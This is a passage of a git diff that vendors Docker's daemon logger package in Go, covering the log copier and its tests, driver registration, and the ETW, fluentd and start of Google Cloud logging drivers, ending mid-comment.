+			if v, ok := envMapping[l]; ok {
+				if keyMod != nil {
+					l = keyMod(l)
+				}
+				extra[l] = v
+			}
+		}
+	}
+
+	return extra
+}
+
+// Hostname returns the hostname from the underlying OS.
+func (ctx *Context) Hostname() (string, error) {
+	hostname, err := os.Hostname()
+	if err != nil {
+		return "", fmt.Errorf("logger: can not resolve hostname: %v", err)
+	}
+	return hostname, nil
+}
+
+// Command returns the command that the container being logged was
+// started with. The Entrypoint is prepended to the container
+// arguments.
+func (ctx *Context) Command() string {
+	terms := []string{ctx.ContainerEntrypoint}
+	terms = append(terms, ctx.ContainerArgs...)
+	command := strings.Join(terms, " ")
+	return command
+}
+
+// ID Returns the Container ID shortened to 12 characters.
+func (ctx *Context) ID() string {
+	return ctx.ContainerID[:12]
+}
+
+// FullID is an alias of ContainerID.
+func (ctx *Context) FullID() string {
+	return ctx.ContainerID
+}
+
+// Name returns the ContainerName without a preceding '/'.
+func (ctx *Context) Name() string {
+	return ctx.ContainerName[1:]
+}
+
+// ImageID returns the ContainerImageID shortened to 12 characters.
+func (ctx *Context) ImageID() string {
+	return ctx.ContainerImageID[:12]
+}
+
+// ImageFullID is an alias of ContainerImageID.
+func (ctx *Context) ImageFullID() string {
+	return ctx.ContainerImageID
+}
+
+// ImageName is an alias of ContainerImageName
+func (ctx *Context) ImageName() string {
+	return ctx.ContainerImageName
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/copier.go b/vendor/github.com/docker/docker/daemon/logger/copier.go
new file mode 100644
index 0000000000..10ab46e162
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/copier.go
@@ -0,0 +1,131 @@
+package logger
+
+import (
+	"bytes"
+	"io"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+)
+
+const (
+	bufSize  = 16 * 1024
+	readSize = 2 * 1024
+)
+
+// Copier can copy logs from specified sources to Logger and attach Timestamp.
+// Writes are concurrent, so you need implement some sync in your logger.
+type Copier struct {
+	// srcs is map of name -> reader pairs, for example "stdout", "stderr"
+	srcs      map[string]io.Reader
+	dst       Logger
+	copyJobs  sync.WaitGroup
+	closeOnce sync.Once
+	closed    chan struct{}
+}
+
+// NewCopier creates a new Copier
+func NewCopier(srcs map[string]io.Reader, dst Logger) *Copier {
+	return &Copier{
+		srcs:   srcs,
+		dst:    dst,
+		closed: make(chan struct{}),
+	}
+}
+
+// Run starts logs copying
+func (c *Copier) Run() {
+	for src, w := range c.srcs {
+		c.copyJobs.Add(1)
+		go c.copySrc(src, w)
+	}
+}
+
+func (c *Copier) copySrc(name string, src io.Reader) {
+	defer c.copyJobs.Done()
+	buf := make([]byte, bufSize)
+	n := 0
+	eof := false
+	msg := &Message{Source: name}
+
+	for {
+		select {
+		case <-c.closed:
+			return
+		default:
+			// Work out how much more data we are okay with reading this time.
+			upto := n + readSize
+			if upto > cap(buf) {
+				upto = cap(buf)
+			}
+			// Try to read that data.
+			if upto > n {
+				read, err := src.Read(buf[n:upto])
+				if err != nil {
+					if err != io.EOF {
+						logrus.Errorf("Error scanning log stream: %s", err)
+						return
+					}
+					eof = true
+				}
+				n += read
+			}
+			// If we have no data to log, and there's no more coming, we're done.
+			if n == 0 && eof {
+				return
+			}
+			// Break up the data that we've buffered up into lines, and log each in turn.
+			p := 0
+			for q := bytes.Index(buf[p:n], []byte{'\n'}); q >= 0; q = bytes.Index(buf[p:n], []byte{'\n'}) {
+				msg.Line = buf[p : p+q]
+				msg.Timestamp = time.Now().UTC()
+				msg.Partial = false
+				select {
+				case <-c.closed:
+					return
+				default:
+					if logErr := c.dst.Log(msg); logErr != nil {
+						logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr)
+					}
+				}
+				p += q + 1
+			}
+			// If there's no more coming, or the buffer is full but
+			// has no newlines, log whatever we haven't logged yet,
+			// noting that it's a partial log line.
+			if eof || (p == 0 && n == len(buf)) {
+				if p < n {
+					msg.Line = buf[p:n]
+					msg.Timestamp = time.Now().UTC()
+					msg.Partial = true
+					if logErr := c.dst.Log(msg); logErr != nil {
+						logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr)
+					}
+					p = 0
+					n = 0
+				}
+				if eof {
+					return
+				}
+			}
+			// Move any unlogged data to the front of the buffer in preparation for another read.
+			if p > 0 {
+				copy(buf[0:], buf[p:n])
+				n -= p
+			}
+		}
+	}
+}
+
+// Wait waits until all copying is done
+func (c *Copier) Wait() {
+	c.copyJobs.Wait()
+}
+
+// Close closes the copier
+func (c *Copier) Close() {
+	c.closeOnce.Do(func() {
+		close(c.closed)
+	})
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/copier_test.go b/vendor/github.com/docker/docker/daemon/logger/copier_test.go
new file mode 100644
index 0000000000..cfd816a6eb
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/copier_test.go
@@ -0,0 +1,296 @@
+package logger
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"os"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+)
+
+type TestLoggerJSON struct {
+	*json.Encoder
+	mu    sync.Mutex
+	delay time.Duration
+}
+
+func (l *TestLoggerJSON) Log(m *Message) error {
+	if l.delay > 0 {
+		time.Sleep(l.delay)
+	}
+	l.mu.Lock()
+	defer l.mu.Unlock()
+	return l.Encode(m)
+}
+
+func (l *TestLoggerJSON) Close() error { return nil }
+
+func (l *TestLoggerJSON) Name() string { return "json" }
+
+func TestCopier(t *testing.T) {
+	stdoutLine := "Line that thinks that it is log line from docker stdout"
+	stderrLine := "Line that thinks that it is log line from docker stderr"
+	stdoutTrailingLine := "stdout trailing line"
+	stderrTrailingLine := "stderr trailing line"
+
+	var stdout bytes.Buffer
+	var stderr bytes.Buffer
+	for i := 0; i < 30; i++ {
+		if _, err := stdout.WriteString(stdoutLine + "\n"); err != nil {
+			t.Fatal(err)
+		}
+		if _, err := stderr.WriteString(stderrLine + "\n"); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	// Test remaining lines without line-endings
+	if _, err := stdout.WriteString(stdoutTrailingLine); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := stderr.WriteString(stderrTrailingLine); err != nil {
+		t.Fatal(err)
+	}
+
+	var jsonBuf bytes.Buffer
+
+	jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)}
+
+	c := NewCopier(
+		map[string]io.Reader{
+			"stdout": &stdout,
+			"stderr": &stderr,
+		},
+		jsonLog)
+	c.Run()
+	wait := make(chan struct{})
+	go func() {
+		c.Wait()
+		close(wait)
+	}()
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("Copier failed to do its work in 1 second")
+	case <-wait:
+	}
+	dec := json.NewDecoder(&jsonBuf)
+	for {
+		var msg Message
+		if err := dec.Decode(&msg); err != nil {
+			if err == io.EOF {
+				break
+			}
+			t.Fatal(err)
+		}
+		if msg.Source != "stdout" && msg.Source != "stderr" {
+			t.Fatalf("Wrong Source: %q, should be %q or %q", msg.Source, "stdout", "stderr")
+		}
+		if msg.Source == "stdout" {
+			if string(msg.Line) != stdoutLine && string(msg.Line) != stdoutTrailingLine {
+				t.Fatalf("Wrong Line: %q, expected %q or %q", msg.Line, stdoutLine, stdoutTrailingLine)
+			}
+		}
+		if msg.Source == "stderr" {
+			if string(msg.Line) != stderrLine && string(msg.Line) != stderrTrailingLine {
+				t.Fatalf("Wrong Line: %q, expected %q or %q", msg.Line, stderrLine, stderrTrailingLine)
+			}
+		}
+	}
+}
+
+// TestCopierLongLines tests long lines without line breaks
+func TestCopierLongLines(t *testing.T) {
+	// Long lines (should be split at "bufSize")
+	const bufSize = 16 * 1024
+	stdoutLongLine := strings.Repeat("a", bufSize)
+	stderrLongLine := strings.Repeat("b", bufSize)
+	stdoutTrailingLine := "stdout trailing line"
+	stderrTrailingLine := "stderr trailing line"
+
+	var stdout bytes.Buffer
+	var stderr bytes.Buffer
+
+	for i := 0; i < 3; i++ {
+		if _, err := stdout.WriteString(stdoutLongLine); err != nil {
+			t.Fatal(err)
+		}
+		if _, err := stderr.WriteString(stderrLongLine); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	if _, err := stdout.WriteString(stdoutTrailingLine); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := stderr.WriteString(stderrTrailingLine); err != nil {
+		t.Fatal(err)
+	}
+
+	var jsonBuf bytes.Buffer
+
+	jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)}
+
+	c := NewCopier(
+		map[string]io.Reader{
+			"stdout": &stdout,
+			"stderr": &stderr,
+		},
+		jsonLog)
+	c.Run()
+	wait := make(chan struct{})
+	go func() {
+		c.Wait()
+		close(wait)
+	}()
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("Copier failed to do its work in 1 second")
+	case <-wait:
+	}
+	dec := json.NewDecoder(&jsonBuf)
+	for {
+		var msg Message
+		if err := dec.Decode(&msg); err != nil {
+			if err == io.EOF {
+				break
+			}
+			t.Fatal(err)
+		}
+		if msg.Source != "stdout" && msg.Source != "stderr" {
+			t.Fatalf("Wrong Source: %q, should be %q or %q", msg.Source, "stdout", "stderr")
+		}
+		if msg.Source == "stdout" {
+			if string(msg.Line) != stdoutLongLine && string(msg.Line) != stdoutTrailingLine {
+				t.Fatalf("Wrong Line: %q, expected 'stdoutLongLine' or 'stdoutTrailingLine'", msg.Line)
+			}
+		}
+		if msg.Source == "stderr" {
+			if string(msg.Line) != stderrLongLine && string(msg.Line) != stderrTrailingLine {
+				t.Fatalf("Wrong Line: %q, expected 'stderrLongLine' or 'stderrTrailingLine'", msg.Line)
+			}
+		}
+	}
+}
+
+func TestCopierSlow(t *testing.T) {
+	stdoutLine := "Line that thinks that it is log line from docker stdout"
+	var stdout bytes.Buffer
+	for i := 0; i < 30; i++ {
+		if _, err := stdout.WriteString(stdoutLine + "\n"); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	var jsonBuf bytes.Buffer
+	//encoder := &encodeCloser{Encoder: json.NewEncoder(&jsonBuf)}
+	jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf), delay: 100 * time.Millisecond}
+
+	c := NewCopier(map[string]io.Reader{"stdout": &stdout}, jsonLog)
+	c.Run()
+	wait := make(chan struct{})
+	go func() {
+		c.Wait()
+		close(wait)
+	}()
+	<-time.After(150 * time.Millisecond)
+	c.Close()
+	select {
+	case <-time.After(200 * time.Millisecond):
+		t.Fatalf("failed to exit in time after the copier is closed")
+	case <-wait:
+	}
+}
+
+type BenchmarkLoggerDummy struct {
+}
+
+func (l *BenchmarkLoggerDummy) Log(m *Message) error { return nil }
+
+func (l *BenchmarkLoggerDummy) Close() error { return nil }
+
+func (l *BenchmarkLoggerDummy) Name() string { return "dummy" }
+
+func BenchmarkCopier64(b *testing.B) {
+	benchmarkCopier(b, 1<<6)
+}
+func BenchmarkCopier128(b *testing.B) {
+	benchmarkCopier(b, 1<<7)
+}
+func BenchmarkCopier256(b *testing.B) {
+	benchmarkCopier(b, 1<<8)
+}
+func BenchmarkCopier512(b *testing.B) {
+	benchmarkCopier(b, 1<<9)
+}
+func BenchmarkCopier1K(b *testing.B) {
+	benchmarkCopier(b, 1<<10)
+}
+func BenchmarkCopier2K(b *testing.B) {
+	benchmarkCopier(b, 1<<11)
+}
+func BenchmarkCopier4K(b *testing.B) {
+	benchmarkCopier(b, 1<<12)
+}
+func BenchmarkCopier8K(b *testing.B) {
+	benchmarkCopier(b, 1<<13)
+}
+func BenchmarkCopier16K(b *testing.B) {
+	benchmarkCopier(b, 1<<14)
+}
+func BenchmarkCopier32K(b *testing.B) {
+	benchmarkCopier(b, 1<<15)
+}
+func BenchmarkCopier64K(b *testing.B) {
+	benchmarkCopier(b, 1<<16)
+}
+func BenchmarkCopier128K(b *testing.B) {
+	benchmarkCopier(b, 1<<17)
+}
+func BenchmarkCopier256K(b *testing.B) {
+	benchmarkCopier(b, 1<<18)
+}
+
+func piped(b *testing.B, iterations int, delay time.Duration, buf []byte) io.Reader {
+	r, w, err := os.Pipe()
+	if err != nil {
+		b.Fatal(err)
+		return nil
+	}
+	go func() {
+		for i := 0; i < iterations; i++ {
+			time.Sleep(delay)
+			if n, err := w.Write(buf); err != nil || n != len(buf) {
+				if err != nil {
+					b.Fatal(err)
+				}
+				b.Fatal(fmt.Errorf("short write"))
+			}
+		}
+		w.Close()
+	}()
+	return r
+}
+
+func benchmarkCopier(b *testing.B, length int) {
+	b.StopTimer()
+	buf := []byte{'A'}
+	for len(buf) < length {
+		buf = append(buf, buf...)
+	}
+	buf = append(buf[:length-1], []byte{'\n'}...)
+	b.StartTimer()
+	for i := 0; i < b.N; i++ {
+		c := NewCopier(
+			map[string]io.Reader{
+				"buffer": piped(b, 10, time.Nanosecond, buf),
+			},
+			&BenchmarkLoggerDummy{})
+		c.Run()
+		c.Wait()
+		c.Close()
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go
new file mode 100644
index 0000000000..f296d7f165
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go
@@ -0,0 +1,170 @@
+// Package etwlogs provides a log driver for forwarding container logs
+// as ETW events.(ETW stands for Event Tracing for Windows)
+// A client can then create an ETW listener to listen for events that are sent
+// by the ETW provider that we register, using the provider's GUID "a3693192-9ed6-46d2-a981-f8226c8363bd".
+// Here is an example of how to do this using the logman utility:
+// 1. logman start -ets DockerContainerLogs -p {a3693192-9ed6-46d2-a981-f8226c8363bd} 0 0 -o trace.etl
+// 2. Run container(s) and generate log messages
+// 3. logman stop -ets DockerContainerLogs
+// 4. You can then convert the etl log file to XML using: tracerpt -y trace.etl
+//
+// Each container log message generates an ETW event that also contains:
+// the container name and ID, the timestamp, and the stream type.
+package etwlogs
+
+import (
+	"errors"
+	"fmt"
+	"sync"
+	"syscall"
+	"unsafe"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/logger"
+	"golang.org/x/sys/windows"
+)
+
+type etwLogs struct {
+	containerName string
+	imageName     string
+	containerID   string
+	imageID       string
+}
+
+const (
+	name             = "etwlogs"
+	win32CallSuccess = 0
+)
+
+var (
+	modAdvapi32          = windows.NewLazySystemDLL("Advapi32.dll")
+	procEventRegister    = modAdvapi32.NewProc("EventRegister")
+	procEventWriteString = modAdvapi32.NewProc("EventWriteString")
+	procEventUnregister  = modAdvapi32.NewProc("EventUnregister")
+)
+var providerHandle syscall.Handle
+var refCount int
+var mu sync.Mutex
+
+func init() {
+	providerHandle = syscall.InvalidHandle
+	if err := logger.RegisterLogDriver(name, New); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// New creates a new etwLogs logger for the given container and registers the EWT provider.
+func New(ctx logger.Context) (logger.Logger, error) {
+	if err := registerETWProvider(); err != nil {
+		return nil, err
+	}
+	logrus.Debugf("logging driver etwLogs configured for container: %s.", ctx.ContainerID)
+
+	return &etwLogs{
+		containerName: fixContainerName(ctx.ContainerName),
+		imageName:     ctx.ContainerImageName,
+		containerID:   ctx.ContainerID,
+		imageID:       ctx.ContainerImageID,
+	}, nil
+}
+
+// Log logs the message to the ETW stream.
+func (etwLogger *etwLogs) Log(msg *logger.Message) error {
+	if providerHandle == syscall.InvalidHandle {
+		// This should never be hit, if it is, it indicates a programming error.
+		errorMessage := "ETWLogs cannot log the message, because the event provider has not been registered."
+		logrus.Error(errorMessage)
+		return errors.New(errorMessage)
+	}
+	return callEventWriteString(createLogMessage(etwLogger, msg))
+}
+
+// Close closes the logger by unregistering the ETW provider.
+func (etwLogger *etwLogs) Close() error {
+	unregisterETWProvider()
+	return nil
+}
+
+func (etwLogger *etwLogs) Name() string {
+	return name
+}
+
+func createLogMessage(etwLogger *etwLogs, msg *logger.Message) string {
+	return fmt.Sprintf("container_name: %s, image_name: %s, container_id: %s, image_id: %s, source: %s, log: %s",
+		etwLogger.containerName,
+		etwLogger.imageName,
+		etwLogger.containerID,
+		etwLogger.imageID,
+		msg.Source,
+		msg.Line)
+}
+
+// fixContainerName removes the initial '/' from the container name.
+func fixContainerName(cntName string) string {
+	if len(cntName) > 0 && cntName[0] == '/' {
+		cntName = cntName[1:]
+	}
+	return cntName
+}
+
+func registerETWProvider() error {
+	mu.Lock()
+	defer mu.Unlock()
+	if refCount == 0 {
+		var err error
+		if err = callEventRegister(); err != nil {
+			return err
+		}
+	}
+
+	refCount++
+	return nil
+}
+
+func unregisterETWProvider() {
+	mu.Lock()
+	defer mu.Unlock()
+	if refCount == 1 {
+		if callEventUnregister() {
+			refCount--
+			providerHandle = syscall.InvalidHandle
+		}
+		// Not returning an error if EventUnregister fails, because etwLogs will continue to work
+	} else {
+		refCount--
+	}
+}
+
+func callEventRegister() error {
+	// The provider's GUID is {a3693192-9ed6-46d2-a981-f8226c8363bd}
+	guid := syscall.GUID{
+		0xa3693192, 0x9ed6, 0x46d2,
+		[8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd},
+	}
+
+	ret, _, _ := procEventRegister.Call(uintptr(unsafe.Pointer(&guid)), 0, 0, uintptr(unsafe.Pointer(&providerHandle)))
+	if ret != win32CallSuccess {
+		errorMessage := fmt.Sprintf("Failed to register ETW provider. Error: %d", ret)
+		logrus.Error(errorMessage)
+		return errors.New(errorMessage)
+	}
+	return nil
+}
+
+func callEventWriteString(message string) error {
+	ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(message))))
+	if ret != win32CallSuccess {
+		errorMessage := fmt.Sprintf("ETWLogs provider failed to log message. Error: %d", ret)
+		logrus.Error(errorMessage)
+		return errors.New(errorMessage)
+	}
+	return nil
+}
+
+func callEventUnregister() bool {
+	ret, _, _ := procEventUnregister.Call(uintptr(providerHandle))
+	if ret != win32CallSuccess {
+		return false
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/factory.go b/vendor/github.com/docker/docker/daemon/logger/factory.go
new file mode 100644
index 0000000000..9cf716b09a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/factory.go
@@ -0,0 +1,104 @@
+package logger
+
+import (
+	"fmt"
+	"sync"
+)
+
+// Creator builds a logging driver instance with given context.
+type Creator func(Context) (Logger, error)
+
+// LogOptValidator checks the options specific to the underlying
+// logging implementation.
+type LogOptValidator func(cfg map[string]string) error
+
+type logdriverFactory struct {
+	registry     map[string]Creator
+	optValidator map[string]LogOptValidator
+	m            sync.Mutex
+}
+
+func (lf *logdriverFactory) register(name string, c Creator) error {
+	if lf.driverRegistered(name) {
+		return fmt.Errorf("logger: log driver named '%s' is already registered", name)
+	}
+
+	lf.m.Lock()
+	lf.registry[name] = c
+	lf.m.Unlock()
+	return nil
+}
+
+func (lf *logdriverFactory) driverRegistered(name string) bool {
+	lf.m.Lock()
+	_, ok := lf.registry[name]
+	lf.m.Unlock()
+	return ok
+}
+
+func (lf *logdriverFactory) registerLogOptValidator(name string, l LogOptValidator) error {
+	lf.m.Lock()
+	defer lf.m.Unlock()
+
+	if _, ok := lf.optValidator[name]; ok {
+		return fmt.Errorf("logger: log validator named '%s' is already registered", name)
+	}
+	lf.optValidator[name] = l
+	return nil
+}
+
+func (lf *logdriverFactory) get(name string) (Creator, error) {
+	lf.m.Lock()
+	defer lf.m.Unlock()
+
+	c, ok := lf.registry[name]
+	if !ok {
+		return c, fmt.Errorf("logger: no log driver named '%s' is registered", name)
+	}
+	return c, nil
+}
+
+func (lf *logdriverFactory) getLogOptValidator(name string) LogOptValidator {
+	lf.m.Lock()
+	defer lf.m.Unlock()
+
+	c, _ := lf.optValidator[name]
+	return c
+}
+
+var factory = &logdriverFactory{registry: make(map[string]Creator), optValidator: make(map[string]LogOptValidator)} // global factory instance
+
+// RegisterLogDriver registers the given logging driver builder with given logging
+// driver name.
+func RegisterLogDriver(name string, c Creator) error {
+	return factory.register(name, c)
+}
+
+// RegisterLogOptValidator registers the logging option validator with
+// the given logging driver name.
+func RegisterLogOptValidator(name string, l LogOptValidator) error {
+	return factory.registerLogOptValidator(name, l)
+}
+
+// GetLogDriver provides the logging driver builder for a logging driver name.
+func GetLogDriver(name string) (Creator, error) {
+	return factory.get(name)
+}
+
+// ValidateLogOpts checks the options for the given log driver. The
+// options supported are specific to the LogDriver implementation.
+func ValidateLogOpts(name string, cfg map[string]string) error {
+	if name == "none" {
+		return nil
+	}
+
+	if !factory.driverRegistered(name) {
+		return fmt.Errorf("logger: no log driver named '%s' is registered", name)
+	}
+
+	validator := factory.getLogOptValidator(name)
+	if validator != nil {
+		return validator(cfg)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go
new file mode 100644
index 0000000000..a8303cf97b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go
@@ -0,0 +1,246 @@
+// Package fluentd provides the log driver for forwarding server logs
+// to fluentd endpoints.
+package fluentd
+
+import (
+	"fmt"
+	"math"
+	"net"
+	"net/url"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/docker/docker/pkg/urlutil"
+	"github.com/docker/go-units"
+	"github.com/fluent/fluent-logger-golang/fluent"
+	"github.com/pkg/errors"
+)
+
+type fluentd struct {
+	tag           string
+	containerID   string
+	containerName string
+	writer        *fluent.Fluent
+	extra         map[string]string
+}
+
+type location struct {
+	protocol string
+	host     string
+	port     int
+	path     string
+}
+
+const (
+	name = "fluentd"
+
+	defaultProtocol    = "tcp"
+	defaultHost        = "127.0.0.1"
+	defaultPort        = 24224
+	defaultBufferLimit = 1024 * 1024
+
+	// logger tries to reconnect 2**32 - 1 times
+	// failed (and panic) after 204 years [ 1.5 ** (2**32 - 1) - 1 seconds]
+	defaultRetryWait  = 1000
+	defaultMaxRetries = math.MaxInt32
+
+	addressKey      = "fluentd-address"
+	bufferLimitKey  = "fluentd-buffer-limit"
+	retryWaitKey    = "fluentd-retry-wait"
+	maxRetriesKey   = "fluentd-max-retries"
+	asyncConnectKey = "fluentd-async-connect"
+)
+
+func init() {
+	if err := logger.RegisterLogDriver(name, New); err != nil {
+		logrus.Fatal(err)
+	}
+	if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// New creates a fluentd logger using the configuration passed in on
+// the context. The supported context configuration variable is
+// fluentd-address.
+func New(ctx logger.Context) (logger.Logger, error) {
+	loc, err := parseAddress(ctx.Config[addressKey])
+	if err != nil {
+		return nil, err
+	}
+
+	tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	if err != nil {
+		return nil, err
+	}
+
+	extra := ctx.ExtraAttributes(nil)
+
+	bufferLimit := defaultBufferLimit
+	if ctx.Config[bufferLimitKey] != "" {
+		bl64, err := units.RAMInBytes(ctx.Config[bufferLimitKey])
+		if err != nil {
+			return nil, err
+		}
+		bufferLimit = int(bl64)
+	}
+
+	retryWait := defaultRetryWait
+	if ctx.Config[retryWaitKey] != "" {
+		rwd, err := time.ParseDuration(ctx.Config[retryWaitKey])
+		if err != nil {
+			return nil, err
+		}
+		retryWait = int(rwd.Seconds() * 1000)
+	}
+
+	maxRetries := defaultMaxRetries
+	if ctx.Config[maxRetriesKey] != "" {
+		mr64, err := strconv.ParseUint(ctx.Config[maxRetriesKey], 10, strconv.IntSize)
+		if err != nil {
+			return nil, err
+		}
+		maxRetries = int(mr64)
+	}
+
+	asyncConnect := false
+	if ctx.Config[asyncConnectKey] != "" {
+		if asyncConnect, err = strconv.ParseBool(ctx.Config[asyncConnectKey]); err != nil {
+			return nil, err
+		}
+	}
+
+	fluentConfig := fluent.Config{
+		FluentPort:       loc.port,
+		FluentHost:       loc.host,
+		FluentNetwork:    loc.protocol,
+		FluentSocketPath: loc.path,
+		BufferLimit:      bufferLimit,
+		RetryWait:        retryWait,
+		MaxRetry:         maxRetries,
+		AsyncConnect:     asyncConnect,
+	}
+
+	logrus.WithField("container", ctx.ContainerID).WithField("config", fluentConfig).
+		Debug("logging driver fluentd configured")
+
+	log, err := fluent.New(fluentConfig)
+	if err != nil {
+		return nil, err
+	}
+	return &fluentd{
+		tag:           tag,
+		containerID:   ctx.ContainerID,
+		containerName: ctx.ContainerName,
+		writer:        log,
+		extra:         extra,
+	}, nil
+}
+
+func (f *fluentd) Log(msg *logger.Message) error {
+	data := map[string]string{
+		"container_id":   f.containerID,
+		"container_name": f.containerName,
+		"source":         msg.Source,
+		"log":            string(msg.Line),
+	}
+	for k, v := range f.extra {
+		data[k] = v
+	}
+	// fluent-logger-golang buffers logs from failures and disconnections,
+	// and these are transferred again automatically.
+	return f.writer.PostWithTime(f.tag, msg.Timestamp, data)
+}
+
+func (f *fluentd) Close() error {
+	return f.writer.Close()
+}
+
+func (f *fluentd) Name() string {
+	return name
+}
+
+// ValidateLogOpt looks for fluentd specific log option fluentd-address.
+func ValidateLogOpt(cfg map[string]string) error {
+	for key := range cfg {
+		switch key {
+		case "env":
+		case "labels":
+		case "tag":
+		case addressKey:
+		case bufferLimitKey:
+		case retryWaitKey:
+		case maxRetriesKey:
+		case asyncConnectKey:
+			// Accepted
+		default:
+			return fmt.Errorf("unknown log opt '%s' for fluentd log driver", key)
+		}
+	}
+
+	if _, err := parseAddress(cfg["fluentd-address"]); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func parseAddress(address string) (*location, error) {
+	if address == "" {
+		return &location{
+			protocol: defaultProtocol,
+			host:     defaultHost,
+			port:     defaultPort,
+			path:     "",
+		}, nil
+	}
+
+	protocol := defaultProtocol
+	givenAddress := address
+	if urlutil.IsTransportURL(address) {
+		url, err := url.Parse(address)
+		if err != nil {
+			return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress)
+		}
+		// unix and unixgram socket
+		if url.Scheme == "unix" || url.Scheme == "unixgram" {
+			return &location{
+				protocol: url.Scheme,
+				host:     "",
+				port:     0,
+				path:     url.Path,
+			}, nil
+		}
+		// tcp|udp
+		protocol = url.Scheme
+		address = url.Host
+	}
+
+	host, port, err := net.SplitHostPort(address)
+	if err != nil {
+		if !strings.Contains(err.Error(), "missing port in address") {
+			return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress)
+		}
+		return &location{
+			protocol: protocol,
+			host:     host,
+			port:     defaultPort,
+			path:     "",
+		}, nil
+	}
+
+	portnum, err := strconv.Atoi(port)
+	if err != nil {
+		return nil, errors.Wrapf(err, "invalid fluentd-address %s", givenAddress)
+	}
+	return &location{
+		protocol: protocol,
+		host:     host,
+		port:     portnum,
+		path:     "",
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go
new file mode 100644
index 0000000000..9a8c1c903f
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go
@@ -0,0 +1,200 @@
+package gcplogs
+
+import (
+	"fmt"
+	"sync"
+	"sync/atomic"
+	"time"
+
+	"github.com/docker/docker/daemon/logger"
+
+	"github.com/Sirupsen/logrus"
+	"golang.org/x/net/context"
+	"google.golang.org/cloud/compute/metadata"
+	"google.golang.org/cloud/logging"
+)
+
+const (
+	name = "gcplogs"
+
+	projectOptKey = "gcp-project"
+	logLabelsKey  = "labels"
+	logEnvKey     = "env"
+	logCmdKey     = "gcp-log-cmd"
+	logZoneKey    = "gcp-meta-zone"
+	logNameKey    = "gcp-meta-name"
+	logIDKey      = "gcp-meta-id"
+)
+
+var (
+	// The number of logs the gcplogs driver has dropped.
+	droppedLogs uint64
+
+	onGCE bool
+
+	// instance metadata populated from the metadata server if available
+	projectID    string
+	zone         string
+	instanceName string
+	instanceID   string
+)
+
+func init() {
+
+	if err := logger.RegisterLogDriver(name, New); err != nil {
+		logrus.Fatal(err)
+	}
+
+	if err := logger.RegisterLogOptValidator(name, ValidateLogOpts); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+type gcplogs struct {
+	client    *logging.Client
+	instance  *instanceInfo
+	container *containerInfo
+}
+
+type dockerLogEntry struct {
+	Instance  *instanceInfo  `json:"instance,omitempty"`
+	Container *containerInfo `json:"container,omitempty"`
+	Data      string         `json:"data,omitempty"`
+}
+
+type instanceInfo struct {
+	Zone string `json:"zone,omitempty"`
+	Name string `json:"name,omitempty"`
+	ID   string `json:"id,omitempty"`
+}
+
+type containerInfo struct {
+	Name      string            `json:"name,omitempty"`
+	ID        string            `json:"id,omitempty"`
+	ImageName string            `json:"imageName,omitempty"`
+	ImageID   string            `json:"imageId,omitempty"`
+	Created   time.Time         `json:"created,omitempty"`
+	Command   string            `json:"command,omitempty"`
+	Metadata  map[string]string `json:"metadata,omitempty"`
+}
+
+var initGCPOnce sync.Once
+
+func initGCP() {
+	initGCPOnce.Do(func() {
+		onGCE = metadata.OnGCE()
+		if onGCE {
+			// These will fail on instances if the metadata service is
+			// down or the client is compiled with an API version that
+			// has been removed. Since these are not vital, let's ignore
+			// them and make their fields in the dockeLogEntry ,omitempty
+			projectID, _ = metadata.ProjectID()
+			zone, _ = metadata.Zone()
+			instanceName, _ = metadata.InstanceName()
+			instanceID, _ = metadata.InstanceID()
+		}
+	})
+}
+
+// New creates a new logger that logs to Google Cloud Logging using the application
+// default credentials.
+//
+// See https://developers.google.com/identity/protocols/application-default-credentials
